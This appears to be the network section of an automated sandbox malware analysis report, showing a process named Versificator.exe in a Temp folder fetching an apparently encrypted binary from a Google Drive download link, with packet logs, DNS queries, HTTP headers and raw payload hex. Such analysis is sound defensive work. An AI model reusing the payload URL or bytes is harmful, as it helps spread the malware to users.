                                                                                            Mar 10, 2025 11:24:35.910079956 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.910121918 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.910170078 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.911643028 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.911700010 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.911725998 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.911777020 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.911819935 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.911870956 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.914690971 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.914742947 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.914808989 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.914865017 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.916121006 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.916184902 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.916217089 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.916270971 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.918641090 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.918705940 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.918740034 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.918787956 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.920615911 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.920672894 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.921387911 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.921457052 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.922568083 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.922624111 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.922655106 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.922705889 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.922758102 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.922806978 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.924177885 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.924233913 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.924324989 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.924375057 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.925322056 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.925375938 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.925488949 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.925542116 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.926997900 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.927054882 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.927092075 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.927141905 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.929166079 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.929229975 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.929249048 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.929301977 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.930707932 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.930763960 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.930804968 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.930856943 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.932077885 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.932137012 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.932161093 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.932212114 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.932254076 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.932322025 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.933757067 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.933805943 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.933811903 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.933852911 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.935416937 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.935468912 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.935476065 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.935520887 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.936832905 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.936892986 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.937094927 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.937427044 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.938481092 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.938688040 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.940135956 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.940145016 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.940186977 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.940697908 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.940757036 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.942560911 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.942615986 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.942704916 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.942754030 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.942817926 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.942867994 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.943891048 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.943942070 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.943986893 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.944036961 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.946655989 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.946711063 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.946795940 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.946851969 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.947482109 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.947534084 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.947578907 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.947628021 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.948695898 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.948746920 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.955972910 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.956036091 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.956053972 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.956099033 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.956150055 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.956203938 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.957155943 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.957201958 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.957240105 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.957290888 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.958050966 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.958102942 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.958390951 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.958441019 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.958692074 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.958746910 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.958830118 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.958878994 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.971576929 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.971643925 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.971677065 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.971826077 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.972031116 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.972090006 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.972126007 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.972176075 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.973573923 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.973638058 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.973669052 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.973721981 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.975105047 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.975162029 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.975334883 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.975385904 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.975418091 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.975469112 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.976865053 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.976923943 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.977437973 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.977487087 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.977533102 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.977585077 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.977657080 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.977710009 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.980004072 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.980062008 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.980092049 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.980143070 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.980185032 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.980232954 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.982001066 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.982064009 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.005121946 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.005184889 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.005683899 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.005752087 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.006170034 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.006228924 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.006319046 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.006378889 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.006431103 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.006484032 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.006531000 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:36.006603956 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:36.006663084 CET49693443192.168.2.7142.250.185.97

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Mar 10, 2025 11:24:27.847306013 CET5760953192.168.2.71.1.1.1
                                                                                            Mar 10, 2025 11:24:27.854898930 CET53576091.1.1.1192.168.2.7
                                                                                            Mar 10, 2025 11:24:30.477838039 CET6320853192.168.2.71.1.1.1
                                                                                            Mar 10, 2025 11:24:30.485310078 CET53632081.1.1.1192.168.2.7

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Mar 10, 2025 11:24:27.847306013 CET192.168.2.71.1.1.10xd292Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                            Mar 10, 2025 11:24:30.477838039 CET192.168.2.71.1.1.10x5b05Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Mar 10, 2025 11:24:27.854898930 CET1.1.1.1192.168.2.70xd292No error (0)drive.google.com216.58.212.142A (IP address)IN (0x0001)false
                                                                                            Mar 10, 2025 11:24:30.485310078 CET1.1.1.1192.168.2.70x5b05No error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • drive.google.com
                                                                                            • drive.usercontent.google.com

                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.749692216.58.212.1424433016C:\Users\user\AppData\Local\Temp\Versificator.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-10 10:24:29 UTC216OUTGET /uc?export=download&id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                            Host: drive.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-10 10:24:30 UTC1610INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Mon, 10 Mar 2025 10:24:30 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'nonce-wcwKcP-VPAiNZZRXjM9d3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.749693142.250.185.974433016C:\Users\user\AppData\Local\Temp\Versificator.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-10 10:24:32 UTC258OUTGET /download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=download HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2025-03-10 10:24:35 UTC5011INHTTP/1.1 200 OK
                                                                                            X-GUploader-UploadID: AKDAyIuadWe0Ogq6V0QhOE8YUhJNW6uFfmDKD-rlE2jITo_uTmBZD4vXWHd420HUsxa0DbtQ
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Security-Policy: sandbox
                                                                                            Content-Security-Policy: default-src 'none'
                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                            X-Content-Security-Policy: sandbox
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Content-Disposition: attachment; filename="eVLjdQOdA35.bin"
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Credentials: false
                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 289856
                                                                                            Last-Modified: Sun, 09 Mar 2025 20:09:20 GMT
                                                                                            Date: Mon, 10 Mar 2025 10:24:35 GMT
                                                                                            Expires: Mon, 10 Mar 2025 10:24:35 GMT
                                                                                            Cache-Control: private, max-age=0
                                                                                            X-Goog-Hash: crc32c=zVyUvA==
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2025-03-10 10:24:35 UTC5011INData Raw: 9c 5a 64 65 0a 8f 38 35 86 40 ca a9 cb c9 9b 1d 66 52 a8 99 7e 02 48 7e 67 0d 05 f5 8d f4 e8 97 42 e4 44 66 ea 92 21 08 1b 5d e5 ad b7 80 84 ca 90 8d ff 37 87 ec e5 7d 12 07 da 04 b3 20 ea 5e 1a 44 a6 e1 b1 20 6f 4c fd cc f2 87 54 50 59 82 63 55 7f 12 8d 01 a2 fb 1b c5 5a 84 3f 20 83 8c ae 15 3c 1d 59 50 a2 63 a3 bd 16 e0 8d d6 2f db 54 ff 85 ba 88 96 b8 8c 05 ab 50 38 ff 2b bf d7 fd 85 b7 f1 67 df 6e 11 42 ad 1b ad 69 4d 38 3f 76 8d 96 bb 9b 19 9b ec 40 9b 19 c4 6e f1 9f 7e 92 f3 c9 ae b7 57 bb 91 62 d0 6d d2 05 25 ac 23 35 df e7 9c dd c1 70 1b ce ab 97 38 89 23 21 87 21 91 71 b2 33 71 4c 87 64 02 f3 0e c7 54 72 e2 27 c3 43 4e d7 67 93 ff b9 8b b0 47 40 b4 41 78 6a fc 37 83 27 47 0e b5 75 2c 82 26 be e8 7d 3f b3 b8 3d ac 22 06 9e 5e e4 e8 fa 81 20 14 04
                                                                                            Data Ascii: Zde85@fR~H~gBDf!]7} ^D oLTPYcUZ? <YPc/TP8+gnBiM8?v@n~Wbm%#5p8#!!q3qLdTr'CNgG@Axj7'Gu,&}?="^
                                                                                            2025-03-10 10:24:35 UTC4672INData Raw: 08 67 e3 58 1b d3 ae 91 c9 aa 1c 18 72 42 82 5c ab 02 c2 6d a5 9a df fd 4f 22 c0 69 a1 cf 04 5b 7f db 75 c0 8a a3 d4 e5 19 40 d1 b5 95 21 7a ba dd 48 ad 29 c5 ab 0c d1 b0 61 98 8c b0 de 37 bd bd 50 30 f5 0b 58 11 3c 78 4d 9e 92 5d 6b 11 a9 03 ad 47 2c 77 0b b7 a6 a8 fa 25 4f 86 e1 4a 74 5b ac a1 8b 2b 41 9b 1f ee 71 7e 04 ff ac 10 97 3e d0 8f d2 44 1c c8 10 62 04 fc 3a 53 ef 92 3e bf f0 f4 76 88 5f 7a df bc f9 e6 7c d4 1d 81 79 21 c9 dd e6 49 33 69 6c d7 38 d9 19 6b d8 d9 4c 88 a5 61 97 9a e0 ae 8e 60 6c e9 8f 62 87 7a c6 ec 91 a7 b7 0e 24 5d 13 4d 8b d2 7a 8b 34 a5 86 2f 71 5c bc ad 58 28 34 7e 12 79 c3 24 b0 80 56 a8 dd 5f 2d 86 bf 5d 6e 67 58 7d 0d dd af 3a fb 1d 09 8d ce 1e a2 3c 75 7c 51 38 5a 3f 22 1b 3a 5f 9e d5 d4 ec 58 44 04 fc f3 d9 a9 bb 6d bd
                                                                                            Data Ascii: gXrB\mO"i[u@!zH)a7P0X<xM]kG,w%OJt[+Aq~>Db:S>v_z|y!I3il8kLa`lbz$]Mz4/q\X(4~y$V_-]ngX}:<u|Q8Z?":_XDm
                                                                                            2025-03-10 10:24:35 UTC1326INData Raw: 6b 48 c5 17 b4 57 6d 44 5c 50 24 2c a9 a0 f4 fc 88 5e 7d 8b 94 4e a4 45 94 19 bc 94 2a 8a 14 b0 5f dd c9 7a 5a a7 c1 eb f4 78 d4 7b ef 62 6e 78 9b d0 b7 21 ee 37 dd ec a7 40 ca a9 7c 2e f5 b1 ce 0b ba 32 f5 49 8d 59 ff 0b a2 7b 89 3b dc 45 71 12 34 c6 4a c3 b8 43 9a 65 40 a7 81 eb ad b2 07 e6 bc 92 b5 28 6a 63 60 c7 9a 45 ed d9 2f ef 4c be fc c3 cd 4a d4 86 f4 36 14 e2 44 22 ff 76 c6 9f b0 8c 68 ed 6a fe 61 9d 66 23 fe 5e 71 15 c2 4d 43 ec 24 14 ef 88 ef e0 b1 01 0b 2f d7 92 47 74 95 47 62 a4 50 10 79 8b 4f 0a bb d5 23 0a 28 0c 64 c9 78 ae f3 d2 3b e5 8f 3f 45 4b a1 d4 c5 cd 8d ac cf 7e 8b 8b 8b a2 a1 f9 08 09 10 6f 9d f0 6f 81 79 cf cb 79 c0 69 24 88 97 3b 8b 90 51 11 34 48 14 0b 43 d8 f3 a3 93 ea 68 1b 06 10 f7 8c 67 52 b7 13 f0 d4 87 f4 bc cb 1f ab 4a
                                                                                            Data Ascii: kHWmD\P$,^}NE*_zZx{bnx!7@|.2IY{;Eq4JCe@(jc`E/LJ6D"vhjaf#^qMC$/GtGbPyO#(dx;?EK~ooyyi$;Q4HChgRJ
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: a2 ff 0d fe ae db 35 7d a8 3c 8a 85 bc e2 1c 93 88 ef a1 9a 11 b1 e3 76 54 9d 12 e9 2c 21 bd 1f f4 01 7f 8f 7c 26 d1 ff d4 63 12 19 0a 8a a5 52 c3 1c 2a 84 6c f6 91 46 06 34 ac 27 da ee 84 ff 15 9b c6 1e 40 b4 5f c7 b5 a9 ed 77 f0 5c b4 83 2e d3 09 22 f9 7b 59 c4 49 47 a4 2e 20 41 12 25 c1 b4 0f a9 eb d1 df 13 08 48 ba 9c 58 a0 42 71 84 22 d6 93 cf e3 b9 66 0f 3c 27 6b 34 19 50 67 2e f9 27 92 1b 80 05 fe a7 b8 ce 78 75 8e 63 9f 96 76 b1 89 e9 b2 81 1a cd 1a cd 26 c6 68 64 99 9a 68 8a 39 fd a8 13 b1 1b 02 b1 ed c9 f4 63 f5 ac a8 11 74 47 b7 80 11 8c 57 a6 85 22 6b ba 1e 9e 39 80 75 9f e4 f5 55 3c f4 93 d7 7d 59 59 27 dc 7e 8b d5 a3 f8 e3 71 76 c2 ba 94 98 c5 8b f5 28 63 e0 f6 76 4d 99 c5 2c 02 eb e1 e2 d7 60 ee f7 1e d1 0d 80 b0 0d d7 6e 41 8e f8 b3 c8 eb
                                                                                            Data Ascii: 5}<vT,!|&cR*lF4'@_w\."{YIG. A%HXBq"f<'k4Pg.'xucv&hdh9ctGW"k9uU<}YY'~qv(cvM,`nA
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: 6b 5c 1b c4 fb a5 c4 be b3 4f 8d b9 8e 8b 78 c7 bc 30 b4 ad 76 4f 11 b1 84 f0 28 10 24 2e 6c 30 48 31 4b ed b4 bd af 86 a9 3a 31 31 7d 3e 70 4e 13 e7 27 23 31 4d c5 9c c3 3e f5 f8 a3 b6 cb 8d ae d3 a6 5b 18 32 c6 c4 91 91 19 f6 82 e5 62 9a 90 67 e4 33 f1 44 cc 32 96 cd dc ce 59 94 73 38 ea b8 e9 5e 3b a3 15 8c a3 ef 17 81 9c 66 3a a4 d4 00 9d 5a c0 62 f8 43 bb e0 dc b4 6a 9d 9f 7f df 6b a2 71 25 ef 58 fa a9 bf 33 76 55 fc fe 29 2e a1 3e 0c 39 5f 59 f1 79 1f 6b 6c 08 f6 52 6b c6 70 ec d0 d2 33 3b e2 c5 9c 1a 38 28 ec 75 ce d9 c7 b1 e3 2f fe b4 26 11 6e 1a 8f e3 08 8a 98 2b c8 6a a6 ed 16 13 57 97 c7 ce ab 87 d8 a4 ab cb d7 24 b2 b3 4a 3f 53 9e fb b1 e5 fa f0 64 44 b1 cc 69 83 22 70 7b aa f6 50 c9 2e 22 7f 33 2d 15 76 c1 40 c3 96 de dc 66 f4 4d 31 c5 5d 43
                                                                                            Data Ascii: k\Ox0vO($.l0H1K:11}>pN'#1M>[2bg3D2Ys8^;f:ZbCjkq%X3vU).>9_YyklRkp3;8(u/&n+jW$J?SdDi"p{P."3-v@fM1]C
